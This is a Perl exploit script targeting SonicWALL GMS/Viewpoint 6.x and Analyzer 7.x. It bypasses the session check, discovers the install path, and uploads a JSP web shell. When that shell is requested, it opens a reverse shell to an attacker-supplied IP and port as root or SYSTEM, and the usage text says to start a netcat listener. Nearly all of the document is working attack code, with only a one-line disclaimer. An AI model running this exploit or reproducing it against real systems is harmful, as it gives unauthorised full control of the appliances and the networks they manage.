#!/usr/bin/perl ## # Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit # Name: sgmsRCE.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. # ## use strict; use HTTP::Request::Common qw(POST); use LWP::UserAgent; use LWP::Protocol::https; use Getopt::Std; my %args; getopt('hlp:', \%args); my $victim = $args{h} || usage(); my $lip = $args{l}; my $lport = $args{p}; my $detect = $args{d}; my $shellname = "cbs.jsp"; banner(); my $gms_path; my $target; my $sysshell; my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},); $agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0"); # Place your Proxy here if needed #$agent->proxy(['http', 'https'], 'http://localhost:8080/'); print "[+] Checking host ...\n"; my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1", Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8', Content => [ num => "123456", action => "show_diagnostics", task => "search", item => "application_log", criteria => "*.*", width => "500", ]; my $result = $agent->request($request); if ($result->is_success) { print "[+] Host looks vulnerable ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } my @lines=split("\n",$result->content); foreach my $line (@lines) { if ($line =~ /OPTION VALUE=/) { my @a=split("\"", $line); if ($a[1] =~ m/logs/i) { my @b=split(/logs/i,$a[1]); $gms_path=$b[0]; } if ($gms_path ne "") { print "[+] GMS Path: $gms_path\n"; last; } else { next; } } } if ($gms_path eq "") { print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n"; exit(0); } if ($gms_path =~ m/^\//) { $target="UNX"; $gms_path=$gms_path."Tomcat/webapps/appliance/"; $sysshell="/bin/sh"; print "[+] Target ist Unix...\n"; } else { $target="WIN"; $gms_path=$gms_path."Tomcat\\webapps\\appliance\\"; $sysshell="cmd.exe"; print "[+] Target ist Windows...\n"; } &_writing_shell; if (!$detect) { print "[+] Uploading shell ...\n"; my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1", Content_Type => 'multipart/form-data', Content => [ action => "file_system", task => "uploadFile", searchFolder => "$gms_path", uploadFileName => ["$shellname"] ]; my $result = $agent->request($request); if ($result->is_success) { print "[+] Upload completed ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } unlink("$shellname"); print "[+] Spawning remote root/system shell ...\n"; my $result = $agent->get("$victim/appliance/$shellname"); if ($result->is_success) { print "[+] Have fun ...\n"; } else { print "[-] Error while connecting ... $result->status_line\n"; exit(0); } } sub _writing_shell { open FILE, ">", "$shellname" or die $!; print FILE << "EOF"; <%\@page import="java.lang.*"%> <%\@page import="java.util.*"%> <%\@page import="java.io.*"%> <%\@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "$lip", $lport ); Process process = Runtime.getRuntime().exec( "$sysshell" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %> EOF close(FILE); } sub usage { print "\n"; print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n"; print "====================================================================\n\n"; print " Usage:\n"; print " $0 -h <http://victim> -l <yourip> -p <yourport>\n"; print " Notes:\n"; print " Start your netcat listener <nc -lp 4444>\n"; print " -d only checks if the Host is vulnerable\n"; print "\n"; print " Author:\n"; print " Nikolas Sotiriu (lofi)\n"; print " url: www.sotiriu.de\n"; print " mail: lofi[at]sotiriu.de\n"; print "\n"; exit(1); } sub banner { print STDERR << "EOF"; -------------------------------------------------------------------------------- SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit -------------------------------------------------------------------------------- EOF }